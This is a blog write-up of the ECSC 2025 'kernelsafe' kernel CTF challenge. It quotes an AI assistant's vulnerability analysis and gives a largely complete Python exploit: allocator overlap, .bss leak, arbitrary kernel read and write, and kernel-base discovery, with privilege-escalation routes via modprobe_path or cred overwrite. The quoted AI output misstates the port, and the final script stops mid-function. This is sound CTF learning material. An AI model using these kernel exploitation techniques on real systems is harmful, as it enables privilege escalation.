a9's thoughts on stuff

Whatever comes to mind. Probably C++.

ECSC2025 Kernelsafe notes

Posted at — Jan 15, 2026

I’ve been revisiting some challenges from ECSC 2025 lately to get some practice with pwn (with the massive help of AI, mind you). This one is kernelsafe, a Linux kernel pwn challenge. While I did a bit of preliminary recon on the challenge during the competition (opening the binary and pressing F5), I didn’t really reverse it back then due to a case of Skill Issue.

What we get

We are presented with an unstripped Linux kernel image, its stripped and compressed counterpart, a rootfs archive and a script to run QEMU with the challenge.

Challenge bundle contents

(ignore the .i64s, they’re just the result of scouting)

Spoiler: there’s a third-party kernel module in the rootfs. The kernel module implements a UDP server hosting a note service. You can add, remove, modify and view notes, which are stored in a memory pool in the kernel module’s .bss section. Since I couldn’t be arsed to actually reverse it and hunt for a bug myself, I took Codex, gave it ida-pro-mcp and let it cook for a bit.

After it cooked for roughly 6 minutes, it output the following:

Here’s the intended solve path based on the module logic in IDA.

Protocol / primitives (from `udp_server_thread`):
- UDP server bound to 0.0.0.0:27002 (`sockaddr` = `0x697A0002`, little‑endian port 0x697a = 27002).
- Request is 272 bytes. Layout (u32 little‑endian):
  - `cmd` = dword 0
  - `len` = dword 1
  - `pos` = dword 2
  - `data` starts at dword 2 (ADD) or dword 3 (INS/MOD)
- Commands (little‑endian ASCII): `ADD` ('DDA'), `DEL` ('LED'), `INS` ('SNI'), `MOD` ('DOM'), `DIS` ('SID').
- All responses send ".OK." after handling. `DIS` sends data first, then ".OK.".

Allocator / structure:
- Single bump pointer pool `mPool` in `.bss`, size 0x4000 at offset 0xE00.
- Chunk layout: `[next (8)][size (8)][data…]`.
- `ADD/INS` check `len <= 0xff`; `MOD`/`DIS` clamp to chunk size.

Core bug (intended):
- `delete_string_at_pos(0)` rewinds the bump pointer to the *current head’s* address, regardless of other newer allocations. If the head is not the most recent allocation, this creates an overlap/UAF window.
- You can force “head not last allocated” by inserting at non‑zero position (allocates at end, but links into middle), then deleting head.

Exploit strategy (likely intended):
1) Create overlap to corrupt chunk header
   - Build list so that the head is not the most recent allocation:
     - ADD A (head=A)
     - ADD B (head=B->A)
     - INS at pos=1 (allocates C at end, list B->C->A; C is newest)
   - DEL pos=0 (delete B). This rewinds pool ptr to B’s start while C still exists.
   - Next ADD/INS now overlaps C’s header. Use it to overwrite C’s `next` and `size`.

2) Leak module globals via oversized read
   - Overlap‑write C’s `size` to a large value.
   - `DIS` head with large `len` → data read spills past `mPool` into `.bss`, leaking:
     - `sock` pointer (`struct socket *`)
     - `udp_thread` pointer (`task_struct *`)
     - other module globals

3) Pivot list head to arbitrary kernel address (AAR/AAW primitive)
   - Overlap‑write head’s `next` to `target_addr - 16`.
   - `DEL pos=0` updates `qword_4E08` (head) to that `next` pointer.
   - Now `DIS pos=0` reads from `target_addr` (since data is at `node+16`).
   - `MOD pos=0` writes to `target_addr` (length limited by *(target-8), but usually enough for small writes).

4) Derive kernel base
   - Use AAR on the leaked `sock` pointer:
     - Read `sock->ops` / function pointer to kernel text.
     - Compute kernel base with known offsets from the provided `vmlinux` (typical in ECSC).
   - Alternatively use `udp_thread` to find `task_struct` and locate `cred`.

5) Priv‑escalate and read `/flag.txt`
   Two common intended routes:
   - **Overwrite `modprobe_path`**: set head to `modprobe_path - 16`, `MOD` to “/tmp/x”, then trigger modprobe from userland to run a script that cats `/flag.txt`.
   - **Overwrite current creds**: use kernel base + offsets to find current task’s `cred` and zero UIDs/GIDs; then read `/flag.txt` as root.

Why this is the intended path:
- There is no file I/O in the module.
- The pool is fixed-size and adjacent to globals, making a size corruption → infoleak obvious.
- The head‑rewind bug is the only clear allocator mistake and is classic for creating overlap/UAF in CTF kernels.

If you want, I can map a concrete exploit sequence (packet layouts, offsets, and a suggested order to leak pointers and compute kernel base) using your vmlinux offsets.
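
One detail in the output above is worth double-checking: the port. `sin_port` is stored in network (big-endian) byte order, so if `0x697A0002` really is the first dword of a `sockaddr_in` as it sits in memory (an assumption, since only the constant is quoted), it decodes to port 31337 rather than 27002. That also happens to be the default `PORT` in the exploit. A minimal check:

```python
import struct

# First dword of the sockaddr, as quoted in the model's output.
SOCKADDR_DWORD = 0x697A0002

raw = struct.pack("<I", SOCKADDR_DWORD)       # bytes as they sit in memory on x86
family = struct.unpack_from("<H", raw, 0)[0]  # sin_family is host-endian
port = struct.unpack_from(">H", raw, 2)[0]    # sin_port is network-endian

print(f"family={family} port={port}")  # family=2 port=31337
```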

After I poked the model a bit and told it we don’t have userspace access, it proceeded to write a PoC exploit around the arbitrary read it had outlined (which comes with an annoying length limit of *(__uint64*)(target_addy - 8) and is fairly slow). After a whole bunch of debugging (UDP packet reception being flaky, and it turning out that you need to restart the VM before every exploit run), the arbitrary read worked and we got the kernel base.
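
To make the head-rewind bug from the model's plan concrete, here is a toy model of the pool in plain Python. It is only a sketch of the behaviour as described above, not the module's actual code: `ToyPool`, the `NULL` sentinel and the method names are made up for illustration, and only deleting the head is modelled.

```python
import struct

POOL_SIZE = 0x4000
HDR = 0x10                 # [next (8)][size (8)]
NULL = 0xFFFFFFFFFFFFFFFF  # toy stand-in for a NULL next pointer


class ToyPool:
    def __init__(self):
        self.mem = bytearray(POOL_SIZE)
        self.top = 0      # bump pointer (offset into the pool)
        self.head = NULL  # offset of the list head

    def next_of(self, off):
        return struct.unpack_from("<Q", self.mem, off)[0]

    def size_of(self, off):
        return struct.unpack_from("<Q", self.mem, off + 8)[0]

    def _alloc(self, data, nxt):
        off = self.top
        struct.pack_into("<QQ", self.mem, off, nxt, len(data))
        self.mem[off + HDR : off + HDR + len(data)] = data
        self.top += HDR + len(data)
        return off

    def add(self, data):
        self.head = self._alloc(data, self.head)
        return self.head

    def ins(self, pos, data):
        # Only pos >= 1 is modelled: allocate at the end, link into the middle.
        prev = self.head
        for _ in range(pos - 1):
            prev = self.next_of(prev)
        off = self._alloc(data, self.next_of(prev))
        struct.pack_into("<Q", self.mem, prev, off)
        return off

    def del_head(self):
        old = self.head
        self.head = self.next_of(old)
        self.top = old  # the bug: rewind to the head, even if newer chunks exist


pool = ToyPool()
a = pool.add(b"A" * 0x20)     # head = A
b = pool.add(b"B" * 0x20)     # head = B -> A
c = pool.ins(1, b"C" * 0x20)  # B -> C -> A, C is the newest allocation
pool.del_head()               # head = C -> A, bump pointer back at B

overlap_off = c - (b + HDR)   # distance from D's data to C's header
payload = b"D" * overlap_off + struct.pack("<QQ", a, 0x500)
d = pool.add(payload.ljust(0x80, b"D"))  # D lands on B and covers C's header

print(hex(d), hex(overlap_off), hex(pool.size_of(c)))
```

D is allocated at B's old address, and its data runs over C's header, so C's `size` field now holds the attacker-chosen 0x500 even though C only ever had 0x20 bytes of data.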

The important pieces of the exploit are below.

def setup_overlap(r, lenA=0x20, lenB=0x20, lenC=0x20, lenD=0x80, c_size=0x500):
    # Layout:
    # A @ 0x00, B @ 0x10+lenA, C @ B+0x10+lenB
    # Insert C at pos=1 so B remains head, then delete B to rewind to B
    # Optionally pad the pool so C sits near the end and small reads can reach .bss.
    pool_ptr = 0
    # Target C data offset so that C_data_off + c_size >= 0x4008 (qword_4E08 - mPool)
    target_c_data = 0x3C00

    # Compute C_data_off if we allocate A,B,C immediately.
    def calc_c_data(pp):
        B_hdr = pp + 0x10 + lenA
        C_hdr = B_hdr + 0x10 + lenB
        return C_hdr + 0x10

    while calc_c_data(pool_ptr) < target_c_data:
        pad = 0xF0  # adds 0x100 including header
        add(r, b"P" * pad)
        pool_ptr += pad + 0x10

    base_off = pool_ptr
    add(r, b"A" * lenA)  # head=A
    pool_ptr += lenA + 0x10
    add(r, b"B" * lenB)  # head=B->A
    pool_ptr += lenB + 0x10
    ins(r, 1, b"C" * lenC)  # head=B->C->A (C allocated at end)
    pool_ptr += lenC + 0x10
    delete(r, 0)  # delete B, rewind pool to B start, head=C->A

    # Allocate D at B start; D becomes head and its data overlaps C header
    # Compute offsets for C header relative to D data
    A_hdr = base_off + 0x0
    B_hdr = base_off + 0x10 + lenA
    C_hdr = B_hdr + 0x10 + lenB
    D_hdr = B_hdr
    D_data = D_hdr + 0x10
    C_data = C_hdr + 0x10
    overlap_off = C_hdr - D_data

    # Overwrite C header: next=0, size=c_size
    new_c_next = 0
    new_c_size = c_size
    payload = b"D" * overlap_off + p64(new_c_next) + p64(new_c_size)
    payload = payload.ljust(lenD, b"D")
    add(r, payload)  # head=D->C->A

    print(
        f"[+] base_off=0x{base_off:04x} C_data_off=0x{C_data:04x} "
        f"target=0x{target_c_data:04x} c_size=0x{c_size:x}"
    )

    # Sanity: if C size was overwritten, reading lenC+1 should succeed.
    test = dis(r, 1, lenC + 1)
    if len(test) != lenC + 1:
        dchk = dis(r, 0, overlap_off + 16)
        print(
            f"[-] overlap check failed (expected {lenC + 1} bytes from C, got {len(test)})"
        )
        if dchk:
            print(f"[-] D payload tail: {dchk[-16:]}")

    return {
        "lenA": lenA,
        "lenB": lenB,
        "lenC": lenC,
        "lenD": lenD,
        "C_data_off": C_data,
        "overlap_off": overlap_off,
        "c_size": c_size,
        "base_off": base_off,
    }


def leak_module_bss(r, layout):
    # Read from C (pos=1) with small size; C is placed near end of pool.
    leak_len = layout["c_size"]
    leak = dis(r, 1, leak_len)

    print(f"Leak ({len(leak)} bytes)")

    # Task struct = 0x448
    # Some cool pointers = 0x470, 0x488
    for i in range(len(leak) // 8):
        print(
            f"+{(i * 8):04x}={int.from_bytes(leak[i * 8 : (i + 1) * 8], byteorder='little'):016x}"
        )

    c_data_off = layout["C_data_off"]

    def qword_at(off):
        return u64(leak[off : off + 8])

    head_off = (HEADPTR_OFF - MPOOL_OFF) - c_data_off
    sock_off = (SOCKPTR_OFF - MPOOL_OFF) - c_data_off

    if (
        head_off < 0
        or sock_off < 0
        or head_off + 8 > len(leak)
        or sock_off + 8 > len(leak)
    ):
        print(
            "[-] Leak window too small to reach module globals; increase c_size or adjust padding."
        )
        return None, None, None, None, None  # same arity as the success path

    head_ptr = qword_at(head_off)
    sock_ptr = qword_at(sock_off)

    # Head should be D at B_hdr (include padding base_off)
    B_hdr = layout["base_off"] + 0x10 + layout["lenA"]
    head_off_from_module = MPOOL_OFF + B_hdr
    module_base_from_head = head_ptr - head_off_from_module

    return head_ptr, sock_ptr, module_base_from_head, qword_at(0x470), qword_at(0x488)


def overwrite_c_next(r, layout, next_ptr):
    # Overwrite C->next using the D overlap. This keeps payload small (<0x100).
    overlap_off = layout["overlap_off"]
    payload = b"D" * overlap_off + p64(next_ptr)
    payload = payload.ljust(layout["lenD"], b"D")
    mod(r, 0, payload)  # head is D at pos=0
    if DEBUG_AAR:
        chk = dis(r, 0, overlap_off + 16)
        if len(chk) >= overlap_off + 16:
            got = u64(chk[overlap_off : overlap_off + 8])
            print(f"[*] C->next set to {got:#x} (expected {next_ptr:#x})")
        else:
            print(f"[*] C->next check short read len={len(chk)}")


def aar_read_via_next(r, layout, target_addr, size):
    # Set C->next = target-16, then read node at pos=2 (D->C->target).
    overwrite_c_next(r, layout, target_addr - 0x10)
    return dis(r, 2, size)
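
The length limit mentioned earlier falls out of how `aar_read_via_next` works: the fake node's header starts at `target - 16`, so whatever qword lives at `target - 8` is treated as its size. The sketch below models that on a plain byte buffer. `toy_dis` and `toy_read_qword_windowed` are hypothetical helpers, and the clamping behaviour is an assumption taken from the model's description (the real module may reject the request instead). It also shows why starting the read a few bytes earlier can help: a different qword then plays the role of the size field.

```python
import struct


def toy_dis(mem, target, n):
    """Model DIS on a fake node whose header starts at target - 16."""
    size = struct.unpack_from("<Q", mem, target - 8)[0]  # fake node's size field
    n = min(n, size)                                     # assumed clamp to chunk size
    return bytes(mem[target : target + n])


def toy_read_qword_windowed(mem, target, back_max=0x40):
    """Start the read earlier so that another qword acts as the size field."""
    for back in range(back_max + 1):
        base = target - back
        data = toy_dis(mem, base, back + 8)
        if len(data) == back + 8:
            return struct.unpack("<Q", data[-8:])[0]
    return None


mem = bytearray(0x100)
struct.pack_into("<Q", mem, 0x40, 0xFFFF888012345678)  # some pointer further back
struct.pack_into("<Q", mem, 0x48, 0)                   # zero qword right before the target
struct.pack_into("<Q", mem, 0x50, 0xFFFFFFFF81CA0740)  # the value we want, at 0x50

direct = toy_dis(mem, 0x50, 8)                 # size field is 0, so nothing comes back
windowed = toy_read_qword_windowed(mem, 0x50)  # succeeds one byte earlier
print(len(direct), hex(windowed))
```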

However, the model got sidetracked and decided to read the flag from the initrd/initramfs, which didn’t work out (the initrd had been cleared and the initramfs pointers couldn’t be obtained). Eventually I said “screw it” and decided to scan the entirety of physical memory for the flag. Unsurprisingly, this didn’t work either: with our meme-tier read speed, a full scan would take way too long. After a while I decided to hack around it and guess the flag’s location in physical memory based on physical memory dumps, seeing as the virtual machine was limited to 64 megabytes of RAM and thus couldn’t have had much room for physical address randomization. That, however, still wasn’t a great idea (and I’m not sure it would have worked with the real flag).
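
For a rough sense of "way too long", here is a back-of-the-envelope estimate. The 64 MiB figure comes from the VM setup, and the 0.2 s per read is a lower bound taken from the deadline in `dis()`, which is normally waited out in full because only two packets arrive. The bytes-per-read values are hypothetical, since the usable read size depends on what sits at `target - 8`.

```python
RAM_BYTES = 64 * 1024 * 1024  # VM memory size
SECONDS_PER_READ = 0.2        # lower bound: dis() waits out its 0.2 s deadline


def scan_hours(bytes_per_read):
    """Hours needed to read all of RAM once at the given chunk size."""
    reads = RAM_BYTES / bytes_per_read
    return reads * SECONDS_PER_READ / 3600


# Hypothetical chunk sizes, from worst case to fairly optimistic.
for chunk in (1, 8, 64):
    print(f"{chunk:>2} bytes/read -> {scan_hours(chunk):7.1f} hours")
```

Even at 8 bytes per read this comes out to roughly 466 hours, which is why guessing the location from memory dumps looked tempting.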

Eventually I revisited the challenge because I got bored and curious about the proper way to solve it. After a bit of Googling and, uh, modern Googling, it turned out that task_struct contains a pointer to an fs_struct, a structure holding file system information for the task (including its root directory), which can be used to walk the file system with the arbitrary read. This seemed like a far more proper solve path than simple brute force. While kernel structure offsets generally depend on the kernel’s build config, this kernel had DWARF debug info embedded, making the job 1000 times easier.
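
The directory walk itself is a linked-list traversal with a `container_of` step. Here is a sketch against a fake memory buffer, using the dentry offsets from the final exploit. `ToyMemory`, `DENTRY_SIZE`, the base address and the file names are all made up for the demo, and the field names in the comments (`d_children`, `d_sib`) are my assumption about what those offsets correspond to.

```python
import struct

# Offsets as used in the exploit (taken from this kernel's DWARF info).
DENTRY_INAME_OFFSET = 56
DENTRY_SIB_OFFSET = 152
DENTRY_CHILD_OFFSET = 168
DENTRY_SIZE = 192  # hypothetical, only used to lay out the toy memory


class ToyMemory:
    """Flat byte buffer standing in for the arbitrary-read primitive."""

    def __init__(self, base, size):
        self.base = base
        self.buf = bytearray(size)

    def read(self, addr, n):
        off = addr - self.base
        return bytes(self.buf[off : off + n])

    def read_qword(self, addr):
        return struct.unpack("<Q", self.read(addr, 8))[0]

    def write(self, addr, data):
        off = addr - self.base
        self.buf[off : off + len(data)] = data

    def write_qword(self, addr, value):
        struct.pack_into("<Q", self.buf, addr - self.base, value)


def list_children(mem, parent):
    """Yield (dentry_addr, name) for each child of the dentry at `parent`."""
    node = mem.read_qword(parent + DENTRY_CHILD_OFFSET)  # d_children.first
    while node:
        dentry = node - DENTRY_SIB_OFFSET                # container_of(node, dentry, d_sib)
        raw = mem.read(dentry + DENTRY_INAME_OFFSET, 16)
        yield dentry, raw.split(b"\x00")[0].decode()
        node = mem.read_qword(node)                      # d_sib.next


# Build a fake root dentry with three children.
BASE = 0xFFFF888000100000  # hypothetical address
names = ["bin", "etc", "flag.txt"]
mem = ToyMemory(BASE, (len(names) + 1) * DENTRY_SIZE)
root = BASE
children = [BASE + (i + 1) * DENTRY_SIZE for i in range(len(names))]
mem.write_qword(root + DENTRY_CHILD_OFFSET, children[0] + DENTRY_SIB_OFFSET)
for i, (addr, name) in enumerate(zip(children, names)):
    mem.write(addr + DENTRY_INAME_OFFSET, name.encode())
    nxt = children[i + 1] + DENTRY_SIB_OFFSET if i + 1 < len(children) else 0
    mem.write_qword(addr + DENTRY_SIB_OFFSET, nxt)

found = [name for _, name in list_children(mem, root)]
print(found)
```

In the real exploit every `read_qword` is a slow round trip over UDP, so stopping as soon as `flag.txt` shows up matters.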

The final exploit:


import struct
import sys
import time

from pwn import p32, p64, remote, u64

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 31337

# vmlinux symbol addresses (non-KASLR) from `nm -n vmlinux`
INET_DGRAM_OPS = 0xFFFFFFFF81CA0740
INITRD_START_SYM = 0xFFFFFFFF822BD058
INITRD_END_SYM = 0xFFFFFFFF822BD050
PAGE_OFFSET_BASE_SYM = 0xFFFFFFFF81DFA1D8
PHYS_INITRD_START_SYM = 0xFFFFFFFF8220C168
INITRAMFS_START_SYM = 0xFFFFFFFF822A0704
INITRAMFS_SIZE_SYM = 0xFFFFFFFF822A0908
MEMMAP_SYM = 0xFFFFFFFF822FA1B8
VMEMMAP_BASE_SYM = 0xFFFFFFFF81DFA1C8

# module offsets (from IDA)
MODULE_BSS_OFFSET_FROM_BASE = 0x2480
HEADPTR_OFF_FROM_BSS = 0x4008
SOCKPTR_OFF_FROM_BSS = 0x40B0
TASKSTRUCT_OFF_FROM_BSS = 0x40B8

MPOOL_OFF = 0x0E00
HEADPTR_OFF = 0x4E08  # qword_4E08
SOCKPTR_OFF = 0x4EB0  # sock
CLEANUP_OFF = 0x6B0  # cleanup_module entry

PKT_SIZE = 272

CMD_ADD = b"ADD\x00"
CMD_DEL = b"DEL\x00"
CMD_INS = b"INS\x00"
CMD_MOD = b"MOD\x00"
CMD_DIS = b"DIS\x00"
DEBUG_KBASE = False
DEBUG_AAR = False
DEBUG_BYTES = False


def make_pkt(cmd, n=0, pos=0, data=b""):
    pkt = bytearray(PKT_SIZE)
    pkt[0:4] = cmd
    pkt[4:8] = p32(n)
    pkt[8:12] = p32(pos)
    if cmd == CMD_ADD:
        pkt[8 : 8 + len(data)] = data
    elif cmd in (CMD_INS, CMD_MOD):
        pkt[12 : 12 + len(data)] = data
    return bytes(pkt)


def send_cmd(r, cmd, n=0, pos=0, data=b"", want_data=False, wait_ok=True):
    pkt = make_pkt(cmd, n, pos, data)
    r.send(pkt)
    if want_data:
        data = r.recv(65535, timeout=2)
        ok = r.recv(16, timeout=2)
        return data
    if not wait_ok:
        return b""
    ok = r.recv(65535, timeout=2)
    return ok


def add(r, data):
    return send_cmd(r, CMD_ADD, n=len(data), data=data)


def ins(r, pos, data):
    return send_cmd(r, CMD_INS, n=len(data), pos=pos, data=data)


def delete(r, pos):
    return send_cmd(r, CMD_DEL, n=pos)


def mod(r, pos, data):
    return send_cmd(r, CMD_MOD, n=len(data), pos=pos, data=data)


def dis(r, pos, n):
    # DIS sends data (if any) and then ".OK." in a separate UDP packet.
    # Order is not guaranteed, so collect a few packets and pick the non-OK payload.
    # Important: do not receive in send_cmd here, or we may truncate the data packet.
    send_cmd(r, CMD_DIS, n=n, pos=pos, want_data=False, wait_ok=False)
    pkts = []
    deadline = time.time() + 0.2
    while time.time() < deadline and len(pkts) < 3:
        pkt = r.recv(65535, timeout=0.07)
        if not pkt:
            continue
        pkts.append(pkt)
    # Prefer a non-OK packet with the largest payload.
    data_pkts = [p for p in pkts if p != b".OK."]
    if data_pkts:
        return max(data_pkts, key=len)
    return b""


def setup_overlap(r, lenA=0x20, lenB=0x20, lenC=0x20, lenD=0x80, c_size=0x500):
    # Layout:
    # A @ 0x00, B @ 0x10+lenA, C @ B+0x10+lenB
    # Insert C at pos=1 so B remains head, then delete B to rewind to B
    # Optionally pad the pool so C sits near the end and small reads can reach .bss.
    pool_ptr = 0
    # Target C data offset so that C_data_off + c_size >= 0x4008 (qword_4E08 - mPool)
    target_c_data = 0x3C00

    # Compute C_data_off if we allocate A,B,C immediately.
    def calc_c_data(pp):
        B_hdr = pp + 0x10 + lenA
        C_hdr = B_hdr + 0x10 + lenB
        return C_hdr + 0x10

    while calc_c_data(pool_ptr) < target_c_data:
        pad = 0xF0  # adds 0x100 including header
        add(r, b"P" * pad)
        pool_ptr += pad + 0x10

    base_off = pool_ptr
    add(r, b"A" * lenA)  # head=A
    pool_ptr += lenA + 0x10
    add(r, b"B" * lenB)  # head=B->A
    pool_ptr += lenB + 0x10
    ins(r, 1, b"C" * lenC)  # head=B->C->A (C allocated at end)
    pool_ptr += lenC + 0x10
    delete(r, 0)  # delete B, rewind pool to B start, head=C->A

    # Allocate D at B start; D becomes head and its data overlaps C header
    # Compute offsets for C header relative to D data
    A_hdr = base_off + 0x0
    B_hdr = base_off + 0x10 + lenA
    C_hdr = B_hdr + 0x10 + lenB
    D_hdr = B_hdr
    D_data = D_hdr + 0x10
    C_data = C_hdr + 0x10
    overlap_off = C_hdr - D_data

    # Overwrite C header: next=0, size=c_size
    new_c_next = 0
    new_c_size = c_size
    payload = b"D" * overlap_off + p64(new_c_next) + p64(new_c_size)
    payload = payload.ljust(lenD, b"D")
    add(r, payload)  # head=D->C->A

    print(
        f"[+] base_off=0x{base_off:04x} C_data_off=0x{C_data:04x} "
        f"target=0x{target_c_data:04x} c_size=0x{c_size:x}"
    )

    # Sanity: if C size was overwritten, reading lenC+1 should succeed.
    test = dis(r, 1, lenC + 1)
    if len(test) != lenC + 1:
        dchk = dis(r, 0, overlap_off + 16)
        print(
            f"[-] overlap check failed (expected {lenC + 1} bytes from C, got {len(test)})"
        )
        if dchk:
            print(f"[-] D payload tail: {dchk[-16:]}")

    return {
        "lenA": lenA,
        "lenB": lenB,
        "lenC": lenC,
        "lenD": lenD,
        "C_data_off": C_data,
        "overlap_off": overlap_off,
        "c_size": c_size,
        "base_off": base_off,
    }


def leak_module_bss(r, layout):
    # Read from C (pos=1) with small size; C is placed near end of pool.
    leak_len = layout["c_size"]
    leak = dis(r, 1, leak_len)

    print(f"Leak ({len(leak)} bytes)")

    # Task struct = 0x448
    # Some cool pointers = 0x470, 0x488
    for i in range(len(leak) // 8):
        print(
            f"+{(i * 8):04x}={int.from_bytes(leak[i * 8 : (i + 1) * 8], byteorder='little'):016x}"
        )

    c_data_off = layout["C_data_off"]

    def qword_at(off):
        return u64(leak[off : off + 8])

    head_off = (HEADPTR_OFF - MPOOL_OFF) - c_data_off
    sock_off = (SOCKPTR_OFF - MPOOL_OFF) - c_data_off

    if (
        head_off < 0
        or sock_off < 0
        or head_off + 8 > len(leak)
        or sock_off + 8 > len(leak)
    ):
        print(
            "[-] Leak window too small to reach module globals; increase c_size or adjust padding."
        )
        return None, None, None, None, None  # same arity as the success path

    head_ptr = qword_at(head_off)
    sock_ptr = qword_at(sock_off)

    # Head should be D at B_hdr (include padding base_off)
    B_hdr = layout["base_off"] + 0x10 + layout["lenA"]
    head_off_from_module = MPOOL_OFF + B_hdr
    module_base_from_head = head_ptr - head_off_from_module

    return head_ptr, sock_ptr, module_base_from_head, qword_at(0x470), qword_at(0x488)


def overwrite_c_next(r, layout, next_ptr):
    # Overwrite C->next using the D overlap. This keeps payload small (<0x100).
    overlap_off = layout["overlap_off"]
    payload = b"D" * overlap_off + p64(next_ptr)
    payload = payload.ljust(layout["lenD"], b"D")
    mod(r, 0, payload)  # head is D at pos=0
    if DEBUG_AAR:
        chk = dis(r, 0, overlap_off + 16)
        if len(chk) >= overlap_off + 16:
            got = u64(chk[overlap_off : overlap_off + 8])
            print(f"[*] C->next set to {got:#x} (expected {next_ptr:#x})")
        else:
            print(f"[*] C->next check short read len={len(chk)}")


def aar_read_via_next(r, layout, target_addr, size):
    # Set C->next = target-16, then read node at pos=2 (D->C->target).
    overwrite_c_next(r, layout, target_addr - 0x10)
    return dis(r, 2, size)


def aaw_write_via_next(r, layout, target_addr, data):
    # Set C->next = target-16, then write via MOD pos=2 to target_addr.
    overwrite_c_next(r, layout, target_addr - 0x10)
    return mod(r, 2, data)


def aaw_write_byte(r, layout, target_addr, value):
    # Write a single byte; requires *(target_addr-8) >= 1.
    return aaw_write_via_next(r, layout, target_addr, bytes([value & 0xFF]))


def aaw_write_qword(r, layout, target_addr, value):
    # Try 8-byte write, fallback to byte-wise writes.
    data = p64(value)
    ok = aaw_write_via_next(r, layout, target_addr, data)
    if ok:
        return ok
    for i, b in enumerate(data):
        aaw_write_byte(r, layout, target_addr + i, b)
    return b""


def patch_node_size(r, layout, node_addr, new_size=0x1000):
    # node layout: [next (8)][size (8)][data...]
    # patch size at node_addr + 8
    aaw_write_qword(r, layout, node_addr + 8, new_size)
    return new_size


def aar_read_min(r, layout, target_addr, size, assert_size=False, can_write=False):
    if can_write:
        aaw_write_qword(r, layout, target_addr - 8, 0xFFFFFFFFFFFFFFFF)

    # Read with adaptive size to satisfy *(target-8) >= size.
    for n in (size, 8, 4, 2, 1):
        if assert_size and n != size:
            break
        if n <= 0:
            continue
        # for _ in range(3):
        data = aar_read_via_next(r, layout, target_addr, n)
        if data:
            return data
        # time.sleep(0.01)
    return b""


def aar_read_qword(r, layout, target_addr):
    data = aar_read_min(r, layout, target_addr, 8, True)
    if len(data) < 8:
        return None
    return u64(data[:8])


def aar_read_bytes(r, layout, target_addr, size):
    out = bytearray()
    for i in range(size):
        b = aar_read_min(r, layout, target_addr + i, 1, True)
        if len(b) != 1:
            if DEBUG_BYTES:
                print(f"[-] byte read failed at {target_addr + i:#x}")
            return None
        out.append(b[0])
        if DEBUG_BYTES:
            print(f"[+] byte {i:02d} @ {target_addr + i:#x} = {b[0]:02x}")
    return bytes(out)


def aar_read_qword_bytewise(r, layout, target_addr):
    data = aar_read_bytes(r, layout, target_addr, 8)
    if not data:
        return None
    return u64(data)


def aar_read_qword_windowed(r, layout, target_addr, back_max=0x40):
    # Try reading a window that ends at target_addr to bypass size checks at target_addr-8.
    for back in range(0, back_max + 1):
        base = target_addr - back
        size = back + 8
        data = aar_read_min(r, layout, base, size, True)
        if len(data) == size:
            return u64(data[-8:])
    return None


def aar_read_chunk(r, layout, addr, size):
    data = aar_read_min(r, layout, addr, size)
    if data:
        return data
    out = bytearray()
    for i in range(size):
        b = aar_read_min(r, layout, addr + i, 1, True)
        out.append(b[0] if b else 0)
    return bytes(out)


def find_kernel_base_from_sock(r, layout, sock_ptr):
    # Read a range of qwords from sock to find a kernel text pointer.
    candidates = []
    for off in range(0, 0x200, 8):
        q = aar_read_qword(r, layout, sock_ptr + off)
        if not q:
            continue
        # Kernel text range heuristic (x86_64): ffffffff80000000 - ffffffffC0000000
        if 0xFFFFFFFF80000000 <= q < 0xFFFFFFFFC0000000:
            # Prefer candidates that match inet_dgram_ops slide and validate by reading page_offset_base.
            # Note for GPT: if this succeeds here, we don't need more scanning for imagebase!
            if not DEBUG_KBASE and (q & 0xFFF) == (INET_DGRAM_OPS & 0xFFF):
                slide = q - INET_DGRAM_OPS
                base = 0xFFFFFFFF81000000 + slide
                if (
                    base & 0xFFF
                ) == 0 and 0xFFFFFFFF80000000 <= base < 0xFFFFFFFFC0000000:
                    test_addr = base + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
                    test = aar_read_min(r, layout, test_addr, 1, True)
                    if test:
                        return base
            candidates.append((off, q))
    if not candidates:
        return None
    if DEBUG_KBASE:
        print("[*] kernel text candidates from sock:")
        for off, q in candidates:
            slide = q - INET_DGRAM_OPS
            base = 0xFFFFFFFF81000000 + slide
            print(f"    off=0x{off:02x} q={q:#x} slide={slide:#x} base={base:#x}")
    # Fallback: try any candidate aligned to 2MB, validate via page_offset_base read.
    for off, q in candidates:
        base = q & ~0x1FFFFF
        if 0xFFFFFFFF80000000 <= base < 0xFFFFFFFFC0000000:
            test_addr = base + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
            test = aar_read_min(r, layout, test_addr, 1, True)
            if test:
                return base
    return None


def main():
    r = remote(HOST, PORT, typ="udp")

    ok = add(r, b"PING")
    if ok != b".OK.":
        print(
            f"[-] No .OK. response to ADD (got {ok!r}); UDP server may be unreachable."
        )
        return
    print("[+] UDP server reachable (.OK. received)")
    # Reset allocator state after the probe.
    delete(r, 0)

    add(r, b"AAAA")
    print(dis(r, 0, 4))
    # Reset allocator state after the test read.
    delete(r, 0)

    layout = setup_overlap(r)
    head_ptr, sock_ptr, module_base, cool_pointer_one, cool_pointer_two = (
        leak_module_bss(r, layout)
    )

    # Diagnostics: read module code ptr via leaked function pointer offsets.
    # If module_base is wrong, these will be inconsistent.
    cleanup_ptr = cool_pointer_one
    add_cold_ptr = cool_pointer_two
    print(f"[+] cleanup_ptr = {cleanup_ptr:#x}")
    print(f"[+] add_string_cold_ptr = {add_cold_ptr:#x}")

    print(f"[+] head_ptr = {hex(head_ptr)}")
    print(f"[+] sock_ptr = {hex(sock_ptr)}")
    module_base_from_cleanup = cleanup_ptr - CLEANUP_OFF
    module_base_aligned = cleanup_ptr & ~0xFFF
    print(f"[+] module_base (from head) = {hex(module_base)}")
    print(f"[+] module_base (from cleanup) = {hex(module_base_from_cleanup)}")
    print(f"[+] module_base (aligned cleanup) = {hex(module_base_aligned)}")

    module_base = module_base_aligned
    print(
        f"[+] Cool ptr 1 = {cool_pointer_one:016x} (udp!cleanup_module), cool pointer two = {cool_pointer_two:016x} (udp!add_string.cold)"
    )

    kbase = find_kernel_base_from_sock(r, layout, sock_ptr)
    if not kbase:
        print("[-] Failed to resolve kernel base")
        return
    print(f"[+] kernel_base = {hex(kbase)}")

    page_offset_base_addr = kbase + (PAGE_OFFSET_BASE_SYM - 0xFFFFFFFF81000000)
    initrd_start_addr = kbase + (INITRD_START_SYM - 0xFFFFFFFF81000000)
    initrd_end_addr = kbase + (INITRD_END_SYM - 0xFFFFFFFF81000000)
    phys_initrd_start_addr = kbase + (PHYS_INITRD_START_SYM - 0xFFFFFFFF81000000)
